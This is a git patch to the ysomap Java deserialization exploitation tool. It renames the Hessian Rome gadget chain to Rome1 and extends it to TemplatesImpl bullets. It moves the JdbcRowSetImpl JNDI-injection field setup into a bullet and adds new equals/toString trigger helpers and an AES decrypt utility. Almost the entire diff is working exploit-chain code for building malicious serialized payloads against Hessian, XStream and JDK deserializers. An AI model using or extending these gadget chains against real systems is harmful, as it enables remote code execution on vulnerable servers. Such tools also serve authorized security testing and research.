From b1ef4a6aeeccc06f5c42735615597b51ff8c6cc7 Mon Sep 17 00:00:00 2001 From: wh1t3p1g Date: Sat, 14 Oct 2023 17:46:45 +0800 Subject: [PATCH] update Rome1 --- .../bullets/jdk/JdbcRowSetImplBullet.java | 12 +++++ .../java/ysomap/core/util/CipherHelper.java | 22 +++++++++ .../java/ysomap/core/util/PayloadHelper.java | 45 ++++++++++++++++++- .../hessian/{Rome.java => Rome1.java} | 29 ++++++------ ...pringPartiallyComparableAdvisorHolder.java | 2 +- .../java/ysomap/payloads/hessian/XBean.java | 2 +- .../payloads/xstream/LazyValueForXStream.java | 2 +- .../payloads/xstream/XMLMessagePacket.java | 2 +- .../ysomap/payloads/xstream/XercesValue.java | 2 +- 9 files changed, 95 insertions(+), 23 deletions(-) rename core/src/main/java/ysomap/payloads/hessian/{Rome.java => Rome1.java} (76%) diff --git a/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java b/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java index f0cf3e0..dc51bf1 100644 --- a/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java +++ b/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java @@ -4,6 +4,9 @@ import ysomap.bullets.AbstractBullet; import ysomap.bullets.Bullet; import ysomap.common.annotation.*; +import ysomap.core.util.ReflectionHelper; + +import java.util.Vector; /** * @author wh1t3P1g @@ -26,6 +29,15 @@ public class JdbcRowSetImplBullet extends AbstractBullet { public JdbcRowSetImpl getObject() throws Exception { JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); jdbcRowSet.setDataSourceName(jndiURL); + + Vector v = new Vector(); + v.add(""); + ReflectionHelper.setFieldValue(jdbcRowSet, "fetchDir", 1); + ReflectionHelper.setFieldValue(jdbcRowSet, "concurrency", 1); + ReflectionHelper.setFieldValue(jdbcRowSet, "rowSetType", 1); + ReflectionHelper.setFieldValue(jdbcRowSet, "iMatchColumns", null); + ReflectionHelper.setFieldValue(jdbcRowSet, "strMatchColumns", v); + ReflectionHelper.setFieldValue(jdbcRowSet, "resBundle", null); return jdbcRowSet; } diff --git a/core/src/main/java/ysomap/core/util/CipherHelper.java b/core/src/main/java/ysomap/core/util/CipherHelper.java index 854f005..29e96ce 100644 --- a/core/src/main/java/ysomap/core/util/CipherHelper.java +++ b/core/src/main/java/ysomap/core/util/CipherHelper.java @@ -3,6 +3,7 @@ import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; +import java.security.Key; /** * @author wh1t3P1g @@ -21,4 +22,25 @@ public static byte[] encrypt(byte[] plain, byte[] key, byte[] iv){ return null; } } + + public static byte[] decrypt(byte[] plain, String key, byte[] iv){ + try{ + // AES/GCM/NoPadding + // AES/ECB/PKCS5Padding + // AES/CBC/PKCS5Padding + Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); + Key speckey = new SecretKeySpec(key.getBytes(), "AES"); + if(iv != null){ + IvParameterSpec ivParameterSpec = new IvParameterSpec(iv); + cipher.init(Cipher.DECRYPT_MODE, speckey, ivParameterSpec); + }else{ + cipher.init(Cipher.DECRYPT_MODE, speckey); + } + + return cipher.doFinal(plain); + }catch (Exception e){ + e.printStackTrace(); + return null; + } + } } diff --git a/core/src/main/java/ysomap/core/util/PayloadHelper.java b/core/src/main/java/ysomap/core/util/PayloadHelper.java index 6d3886c..285b13a 100755 --- a/core/src/main/java/ysomap/core/util/PayloadHelper.java +++ b/core/src/main/java/ysomap/core/util/PayloadHelper.java @@ -129,7 +129,13 @@ public static HashSet makeHashSetWithEntry(Object entry) throws NoSuchFieldExcep return set; } - // triger compareTo function + /** + * trigger a.compare(b) + * @param a + * @param b + * @return + * @throws Exception + */ public static Object makePriorityQueue(Object a, Object b) throws Exception { // create queue with numbers and basic comparator final PriorityQueue queue = new PriorityQueue(2); @@ -143,7 +149,13 @@ public static Object makePriorityQueue(Object a, Object b) throws Exception { return queue; } - public static Object makeTreeSetWithXString(Object obj) throws Exception { + /** + * trigger obj.toString for non-serializable payload + * @param obj + * @return + * @throws Exception + */ + public static Object makeTreeSetWithXStringToStringTrigger(Object obj) throws Exception { Object rdnEntry1 = ReflectionHelper.newInstance("javax.naming.ldap.Rdn$RdnEntry", null); ReflectionHelper.setFieldValue(rdnEntry1, "type", "ysomap"); ReflectionHelper.setFieldValue(rdnEntry1, "value", new XString("test")); @@ -295,6 +307,35 @@ public static Object makeReadObjectToStringTrigger(Object obj) throws Exception return list; } + /** + * trigger obj2.equals(obj1) + * @param obj1 + * @param obj2 + * @return + * @throws Exception + */ + public static Object makeHashmapEqualsTrigger(Object obj1, Object obj2) throws Exception { + Map map1 = new HashMap<>(); + Map map2 = new HashMap<>(); + map1.put("yy", obj1); + map1.put("zZ", obj2); + + map2.put("yy", obj2); + map2.put("zZ", obj1); + return makeMap(map1, map2); + } + + /** + * trigger obj.toString() + * @param obj + * @return + * @throws Exception + */ + public static Object makeXStringToStringTrigger(Object obj) throws Exception { + XString xString = new XString("ysomap"); + return makeHashmapEqualsTrigger(obj, xString); + } + /** * 用于创造一个拥有同样hash的对象 * 这样在map.put过程中将触发equal函数 diff --git a/core/src/main/java/ysomap/payloads/hessian/Rome.java b/core/src/main/java/ysomap/payloads/hessian/Rome1.java similarity index 76% rename from core/src/main/java/ysomap/payloads/hessian/Rome.java rename to core/src/main/java/ysomap/payloads/hessian/Rome1.java index 684ede9..743eafa 100644 --- a/core/src/main/java/ysomap/payloads/hessian/Rome.java +++ b/core/src/main/java/ysomap/payloads/hessian/Rome1.java @@ -6,18 +6,18 @@ import ysomap.core.util.PayloadHelper; import ysomap.core.util.ReflectionHelper; -import java.util.Vector; +import javax.xml.transform.Templates; /** * @author wh1t3p1g * @since 2021/8/5 */ @Payloads -@Authors({ Authors.MBECHLER }) -@Targets({Targets.HESSIAN}) -@Require(bullets = {"JdbcRowSetImplBullet"},param = false) +@Authors({ Authors.MBECHLER, Authors.whocansee}) +@Targets({Targets.HESSIAN, Targets.JDK}) +@Require(bullets = {"JdbcRowSetImplBullet", "TemplatesImplBullet"},param = false) @Dependencies({"com.rometools:rome:1.11.1"}) -public class Rome extends HessianPayload{ +public class Rome1 extends HessianPayload{ @Override public Bullet getDefaultBullet(Object... args) throws Exception { @@ -26,17 +26,14 @@ public Bullet getDefaultBullet(Object... args) throws Exception { @Override public Object pack(Object obj) throws Exception { - Vector v = new Vector(); - v.add(""); - ReflectionHelper.setFieldValue(obj, "fetchDir", 1); - ReflectionHelper.setFieldValue(obj, "concurrency", 1); - ReflectionHelper.setFieldValue(obj, "rowSetType", 1); - ReflectionHelper.setFieldValue(obj, "iMatchColumns", null); - ReflectionHelper.setFieldValue(obj, "strMatchColumns", v); - ReflectionHelper.setFieldValue(obj, "resBundle", null); + Object stringBean = null; + if(obj instanceof Templates){ + stringBean = makeStringBean(Templates.class, obj); + }else{ + Class type = obj.getClass(); + stringBean = makeStringBean(type, obj); + } - Class type = obj.getClass(); - Object stringBean = makeStringBean(type, obj); Object equalsBean = makeEqualsBean(makeStringBeanClass(), stringBean); // ObjectBean delegate = new ObjectBean(type, obj); @@ -46,7 +43,7 @@ public Object pack(Object obj) throws Exception { return PayloadHelper.makeMap(equalsBean, ""); // return PayloadHelper.makeMap(root, root); - // using XString triger to ToStringBean also work + // using XString trigger to ToStringBean also work } public Class makeStringBeanClass() throws ClassNotFoundException { diff --git a/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java b/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java index 1852c12..d770cda 100644 --- a/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java +++ b/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java @@ -43,6 +43,6 @@ public Object pack(Object obj) throws Exception { .forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); Object pcah = ReflectionHelper.createWithoutConstructor(pcahCl); ReflectionHelper.setFieldValue(pcah, "advisor", advisor); - return PayloadHelper.makeTreeSetWithXString(pcah); + return PayloadHelper.makeTreeSetWithXStringToStringTrigger(pcah); } } diff --git a/core/src/main/java/ysomap/payloads/hessian/XBean.java b/core/src/main/java/ysomap/payloads/hessian/XBean.java index 18adc68..acc071a 100644 --- a/core/src/main/java/ysomap/payloads/hessian/XBean.java +++ b/core/src/main/java/ysomap/payloads/hessian/XBean.java @@ -31,6 +31,6 @@ public Object pack(Object obj) throws Exception { Context ctx = ReflectionHelper.createWithoutConstructor(WritableContext.class); ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", obj, ctx); ReflectionHelper.setFieldValue(binding, "boundObj", null); - return PayloadHelper.makeTreeSetWithXString(binding); + return PayloadHelper.makeTreeSetWithXStringToStringTrigger(binding); } } diff --git a/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java b/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java index 4c87e9f..9cc1818 100644 --- a/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java +++ b/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java @@ -53,7 +53,7 @@ public Object pack(Object obj) throws Exception { ReflectionHelper.newInstance("javax.swing.MultiUIDefaults", new Object[]{new UIDefaults[]{uiDefaults}}); uiDefaults.put("lazyValue", obj); - return PayloadHelper.makeTreeSetWithXString(multiUIDefaults); + return PayloadHelper.makeTreeSetWithXStringToStringTrigger(multiUIDefaults); } } diff --git a/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java b/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java index b1b2d1f..8a7bb61 100644 --- a/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java +++ b/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java @@ -65,6 +65,6 @@ public Object pack(Object obj) throws Exception { ReflectionHelper.setFieldValue(msg, "bodyParts", new ArrayList()); ReflectionHelper.setFieldValue(packet, "satellites", null); ReflectionHelper.setFieldValue(packet, "viewthis", null); - return PayloadHelper.makeTreeSetWithXString(packet); + return PayloadHelper.makeTreeSetWithXStringToStringTrigger(packet); } } diff --git a/core/src/main/java/ysomap/payloads/xstream/XercesValue.java b/core/src/main/java/ysomap/payloads/xstream/XercesValue.java index bcf1b9a..89ac57c 100644 --- a/core/src/main/java/ysomap/payloads/xstream/XercesValue.java +++ b/core/src/main/java/ysomap/payloads/xstream/XercesValue.java @@ -86,7 +86,7 @@ public Object pack(Object obj) throws Exception { XRTreeFrag xrTreeFrag = new XRTreeFrag(1, new XPathContext()); ReflectionHelper.setFieldValue(xrTreeFrag, "m_DTMXRTreeFrag", dtmxrTreeFrag); - return PayloadHelper.makeTreeSetWithXString(xrTreeFrag); + return PayloadHelper.makeTreeSetWithXStringToStringTrigger(xrTreeFrag); } }